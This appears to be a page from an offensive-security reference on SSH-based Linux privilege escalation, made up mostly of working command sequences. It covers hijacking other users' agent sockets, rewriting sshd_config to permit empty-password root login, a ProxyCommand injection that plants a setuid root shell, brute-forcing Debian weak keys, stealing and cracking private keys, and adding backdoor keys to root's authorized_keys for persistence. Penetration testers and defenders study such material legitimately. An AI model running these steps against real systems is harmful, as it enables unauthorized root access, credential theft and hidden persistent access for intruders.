> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# SSH Exploitation

> Privilege escalation via SSH: agent forwarding hijack, writable SSH configs, weak keys, and authorized_keys abuse.

## SSH Agent Forwarding Hijack

If another user has SSH agent forwarding enabled, you can use their agent socket to authenticate as them to remote hosts.

### Find Active Agent Sockets

```bash theme={"dark"}
find /tmp -name "agent.*" -type s 2>/dev/null
ls -la /tmp/ssh-*/
```

### Identify Socket Owner

```bash theme={"dark"}
# Find which process owns the socket
lsof /tmp/ssh-XXXXXXXX/agent.YYYY 2>/dev/null

# Or check environment of SSH processes
grep -z SSH_AUTH_SOCK /proc/*/environ 2>/dev/null | tr '\0' '\n'
```

### Hijack Agent

```bash theme={"dark"}
export SSH_AUTH_SOCK=/tmp/ssh-XXXXXXXX/agent.YYYY
ssh-add -l
```

If keys listed → you can use them:

```bash theme={"dark"}
ssh root@internal-server
ssh admin@other-host
```

### Automate Discovery

```bash theme={"dark"}
for sock in $(find /tmp -name "agent.*" -type s 2>/dev/null); do
    export SSH_AUTH_SOCK=$sock
    keys=$(ssh-add -l 2>/dev/null)
    if [ $? -eq 0 ]; then
        echo "=== $sock ==="
        echo "$keys"
    fi
done
```

***

## Writable SSH Config

### /etc/ssh/sshd\_config

```bash theme={"dark"}
ls -la /etc/ssh/sshd_config
```

If writable — enable root login:

```
PermitRootLogin yes
PasswordAuthentication yes
PermitEmptyPasswords yes
```

Reload:

```bash theme={"dark"}
systemctl reload sshd
```

### \~/.ssh/authorized\_keys

If writable for another user:

```bash theme={"dark"}
ls -la /home/*/.ssh/authorized_keys
ls -la /root/.ssh/authorized_keys 2>/dev/null
```

Add your key:

```bash theme={"dark"}
ssh-keygen -t ed25519 -f /tmp/key -N ""
echo "$(cat /tmp/key.pub)" >> /root/.ssh/authorized_keys
ssh -i /tmp/key root@localhost
```

### \~/.ssh/config

If writable — inject ProxyCommand:

```
Host *
    ProxyCommand /bin/bash -c 'cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash'
```

Triggers on next SSH connection by that user.

***

## Debian Weak Keys (CVE-2008-0166)

Debian OpenSSL bug generated only 32,768 possible keys.

### Check

```bash theme={"dark"}
cat /etc/debian_version
# Affected: Debian 4.0 (Etch), Ubuntu 7.04-8.04
```

### Exploit

Download pre-generated keys:

```bash theme={"dark"}
https://github.com/g0tmi1k/debian-ssh
```

Try each key against target:

```bash theme={"dark"}
for key in rsa/2048/*.pub; do
    ssh -i ${key%.pub} -o BatchMode=yes root@TARGET 2>/dev/null && echo "FOUND: $key"
done
```

***

## SSH Private Keys on Disk

### Find Keys

```bash theme={"dark"}
find / -name "id_rsa" -o -name "id_ed25519" -o -name "id_ecdsa" -o -name "id_dsa" 2>/dev/null
find / -name "*.pem" -o -name "*.key" 2>/dev/null | grep -i ssh
```

### Check Permissions (Readable?)

```bash theme={"dark"}
ls -la /home/*/.ssh/id_* 2>/dev/null
cat /root/.ssh/id_rsa 2>/dev/null
```

### Use Found Key

```bash theme={"dark"}
chmod 600 stolen_key
ssh -i stolen_key user@TARGET
```

### Crack Passphrase

If key is encrypted:

```bash theme={"dark"}
ssh2john id_rsa > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
```

***

## SSH Persistence

### Add Key to Root

```bash theme={"dark"}
mkdir -p /root/.ssh
echo "ssh-ed25519 AAAA... attacker@host" >> /root/.ssh/authorized_keys
chmod 700 /root/.ssh
chmod 600 /root/.ssh/authorized_keys
```

### Generate Key Pair on Target

```bash theme={"dark"}
ssh-keygen -t ed25519 -f /root/.ssh/backdoor -N ""
cat /root/.ssh/backdoor  # Copy private key to attacker
echo "$(cat /root/.ssh/backdoor.pub)" >> /root/.ssh/authorized_keys
```

***

## Quick Reference

| Technique                 | Requirement                        |
| ------------------------- | ---------------------------------- |
| Agent forwarding hijack   | Active SSH agent socket accessible |
| Writable authorized\_keys | Write access to \~/.ssh/           |
| Writable sshd\_config     | Write access to /etc/ssh/          |
| Debian weak keys          | Debian Etch / Ubuntu 7-8           |
| Private key theft         | Readable key files                 |
